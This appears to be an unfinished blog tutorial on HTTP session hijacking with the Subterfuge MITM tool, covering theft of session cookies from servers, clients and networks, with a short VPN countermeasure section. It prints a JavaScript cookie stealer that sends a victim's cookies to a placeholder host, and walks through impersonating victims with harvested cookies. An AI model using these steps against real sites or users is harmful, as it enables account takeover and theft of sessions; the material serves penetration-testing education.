HTTP Code Injection

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!

——————–

Here we are discussing the subject of session hijacking attacks within the scope of an HTTP/HTTPS conversation. It is important to note several distinctions here. Firstly, session hijacking is a vulnerability of many protocols, but we will only be examining web traffic, and secondly, performing session hijacking over HTTPS is a much more involved process then doing the same to its less evolved cousin. In this post we will not be directly attacking HTTPS, but we will; however, discuss methods to get around it.

Session Hijacking: The process of assuming control of an active or latent TCP/IP session through impersonation of a user by way of a session identifier as opposed to legitimate authentication credentials.

HTTP Sessions

Web is a stateless protocol. This means that the web server does not, and cannot remember who you are in between browser requests. Each time you click a link on a website the webserver thinks that you are an entirely new person. This facet of the protocol we have most closely come to identify with on the Internet is extremely problematic. If a web server does not remember who we are, how can it remember what is in our shopping cart, or more importantly whom that cart belongs to? To solve this issue we have session cookies.

Here’s an example of a session cookie embedded within a TCP Stream:

[Example Pic]

Most importantly, this cookie is sent along with every single HTTP request your browser makes to the associated web server. If we steal this cookie from a victim, and tell our browser to use it whilst communicating with the server, we can essentially become them. If you are interested in an example of how to modify your browser cookies through URL injection check out this [post].

Stealing Session Cookies

So how do we acquire session cookies from victims? Really the limit here is your creativity, but some criteria must be met. As the penetration tester you must be able to leverage some form of access to the flow of data that the cookie follows. This means you need access to either the data a rest, or the data in motion.

Data at Rest

With the exception of potential caching at proxies and other network resources there are two primary locations where cookies live: on the web server and on the client computer. We now have two targets.

Data in Motion

Alternately, if we have access to any host that must route the web traffic it is trivial to pull the session cookie out of the TCP stream, but there is a problem. These days most cookies are no longer sent across the Internet in plaintext. They use HTTPS. This means that access to routers along the path the data takes is not enough steal the plaintext cookie needed to perpetrate session hijacking. We’ll end by demonstrating a method to get around this issue using Subterfuge.

Attacking the Web Server

This attack requires the exploitation of some kind of vulnerability in a web application on the target web server. If you can get code to execute in the victims browser then you can steal their session cookies. It is important to note that we only need the victim’s browser to execute the code, not the web server itself. This means that we don’t need to be able to render a server based language like PHP. For our purposes JavaScript is good enough. Below is an example of a simple cookie stealer script:

document.location='http://IP:PORT/grab.cgi?'+document.cookie;

Once we inject this into the target website the simple act of a victim browsing to the webpage will cause the plaintext cookie to be transmitted to our webserver. The last step is to retrieve the cookies from our webserver. Typically this is done with a catcher script, but we’re going to be a bit different. Below is a bash script to pull the cookies out of your apache logs. By using this we can theoretically utilize a compromised webserver to perpetrate our attack without leaving behind any artifacts like a cookie stealer script!

[Apache Logs Cookie Parser Script]

Attacking the User

We will only be discussing the Firefox browser here; however, the same techniques can be applied regardless of browser. If you are able to trigger a vulnerability to gain access to a victim’s machine you may be able to directly access the cookie database associated with his browser profile. Firefox uses an SQLite database to store session cookies. In order to dump the database, run the following commands:

 

Then read the plaintext cookies!

Attacking the Network with Subterfuge

A new feature in Subterfuge 5.1 is Session Hijacking. Subterfuge comes with multiple methods of achieving a man-in-the-middle position on victim traffic. Now it can also harvest web session cookies. In order to do this, start a MITM attack. When a victim browses to a website that uses cookies Subterfuge will automatically log them and display the data on screen.

 

The next step is to use Subterfuge’s cookie swapper script to impersonate the victim. Click on CookieSwapper, and copy the JavaScript that pops up.

 

[CookieSwapper Pic]

 

Paste the script into a text editor. We now have to set the value of the cookie we want to impersonate. In Subterfuge, clicking on the session allows you to copy the cookie value.

 

[Cookie Copy Pic]

 

In your text editor replace section of the script that says “COOKIE DATA GOES HERE!!!” with the value you copied from subterfuge (be sure to put the data within “”).

The final step is to tell our browser to use this cookie when communicating with a target webserver. To this first browse to the target website. When you are there open your browser’s scripting console. This allows you to run arbitrary JavaScript within your browser window. In Chrome this can be done by: right click -> inspect element -> click on the “show console” icon in the bottom left corner. In Firefox (which we used in the making of this tutorial) use the key command: ctrl + shift + k. Paste your script into the console at the bottom of the page denoted by >.

 

[Script Console Pic]

 

Refresh the page and enjoy your session!

 

For a video of this attack in action click [here].

Countermeasures

 

I hope that this post thoroughly demonstrates the dangers of session hijacking. Attackers really don’t need your login username and password to wreak havoc on your online footprint. Don’t leave your security up to the vendors, or network operators, because they have no incentive to protect you! Take your security into your own hands.

 

To protect yourself from attacks like this one we recommend the use of encryption to encapsulate your traffic when operating on untrusted networks. OpenVPN is an outstanding protocol, and is fairly simple to setup as well. Client programs exist for all major operating systems including Android and iOS. Personally, I use [Link TunnelBlick] on my Mac, and the official clients elsewhere.

 

I hope that this post has been informative for you!

Rogue DHCP Server

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!